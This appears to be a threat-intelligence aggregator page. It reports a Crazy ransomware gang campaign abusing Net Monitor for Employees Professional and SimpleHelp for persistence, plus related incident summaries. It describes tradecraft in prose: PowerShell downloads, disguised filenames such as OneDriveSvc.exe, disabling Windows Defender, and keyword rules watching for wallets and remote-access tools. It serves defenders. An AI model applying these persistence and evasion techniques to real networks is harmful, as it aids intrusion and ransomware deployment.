Crazy ransomware gang Net Monitor for Employees Professional and SimpleHelp persistence campaign
Campaign
Summary
Hide ▲
Show ▼
Crazy ransomware gang is running a remote-access persistence campaign that uses legitimate monitoring and support tools to keep footholds inside corporate networks, raising the risk of ransomware deployment. Researchers observed the operators pair Net Monitor for Employees Professional with SimpleHelp to blend in with normal administration while preserving access. The tradecraft includes compromised SSL VPN credentials, disguised filenames, and attempts to disable Windows Defender. In one case, the actors also monitored for cryptocurrency wallets and remote-management tools to support follow-on extortion.
Related Happenings
Russian-speaking hacker AI-assisted FortiGate breach campaign
Campaign
First: 21.02.2026 15:50
Last: 21.02.2026 15:50
Sources 1
About this happening:
The **Russian-speaking** threat actor ran an **AI-assisted FortiGate breach campaign** from **January 11 to February 18, 2026**, compromising **over 600 FortiGate devices** across...
Russian-speaking hacker AI-assisted FortiGate breach campaign
CampaignAbout this happening: The **Russian-speaking** threat actor ran an **AI-assisted FortiGate breach campaign** from **January 11 to February 18, 2026**, compromising **over 600 FortiGate devices** across...
Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse
Malware Activity
First: 12.02.2026 16:25
Last: 12.02.2026 16:25
Sources 1
About this happening:
**Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...
Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse
Malware ActivityAbout this happening: **Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...
BlueNoroff spear-phishing campaign uses typosquatted Zoom, Teams, and Calendly lures against crypto firms
Campaign
First: 11.02.2026 00:17
Last: 11.02.2026 00:17
Sources 1
About this happening:
**BlueNoroff**, a **North Korea-linked Lazarus Group** subgroup, ran a **large-scale spear-phishing campaign** against **100+ cryptocurrency organizations** in **20+ countries** b...
BlueNoroff spear-phishing campaign uses typosquatted Zoom, Teams, and Calendly lures against crypto firms
CampaignAbout this happening: **BlueNoroff**, a **North Korea-linked Lazarus Group** subgroup, ran a **large-scale spear-phishing campaign** against **100+ cryptocurrency organizations** in **20+ countries** b...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation Wave
First: 09.02.2026 16:42
Last: 09.02.2026 16:42
Sources 1
About this happening:
**SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation WaveAbout this happening: **SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
Latest development: 10.03.2026 08:17
CISA added CVE-2025-26399 in SolarWinds Web Help Desk to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation, said Microsoft and Huntress had reported threat actors using SolarWinds Web Help Desk flaws to obtain initial access, attributed the activity to the Warlock ransomware crew, and ordered Federal Civilian Executive Branch (FCEB) agencies to apply the fix by March 12, 2026.
SmarterTools hit by ransomware attack
Incident
First: 09.02.2026 14:02
Last: 09.02.2026 14:02
Sources 1
About this happening:
**SmarterTools** suffered a **ransomware attack** on **January 29** after attackers used an **unpatched SmarterMail VM** to gain access, disrupting the company’s **office network*...
SmarterTools hit by ransomware attack
IncidentAbout this happening: **SmarterTools** suffered a **ransomware attack** on **January 29** after attackers used an **unpatched SmarterMail VM** to gain access, disrupting the company’s **office network*...
Latest development: 10.02.2026 12:24
ReliaQuest identified activity likely tied to Warlock on SmarterTools systems that abused CVE-2026-23760 to bypass SmarterMail authentication, stage ransomware payloads on internet-facing systems, and chain the access with the software's built-in Volume Mount feature to gain full system control before installing Velociraptor; CISA also confirmed CVE-2026-24423 was being exploited in ransomware attacks.
Timeline
-
11.02.2026 21:29 2 articles · 3mo ago
Crazy ransomware gang expands a remote-access persistence campaign
Campaign Scope UpdateHuntress observed multiple intrusions in which a member of the Crazy ransomware gang used Net Monitor for Employees Professional and SimpleHelp to maintain persistence in corporate networks, blend in with normal administration, and prepare for ransomware deployment. In one intrusion, attackers installed Net Monitor for Employees Professional with msiexec.exe, then downloaded and executed SimpleHelp via PowerShell using filenames such as vhost.exe and C:\ProgramData\OneDriveSvc\OneDriveSvc.exe; they also tried to enable the local administrator account and disable Windows Defender. In one incident, SimpleHelp rules were configured to watch for cryptocurrency-wallet terms and remote-management keywords such as RDP, anydesk, ultraview, teamview, and VNC, and Huntress said compromised SSL VPN credentials enabled both breaches while reused vhost.exe and overlapping C2 infrastructure suggested the same operator was behind both cases.
Show sources
- Crazy ransomware gang abuses employee monitoring tool in attacks — www.bleepingcomputer.com — 11.02.2026 21:29
- Crazy ransomware gang abuses employee monitoring tool in attacks — www.bleepingcomputer.com — 11.02.2026 21:29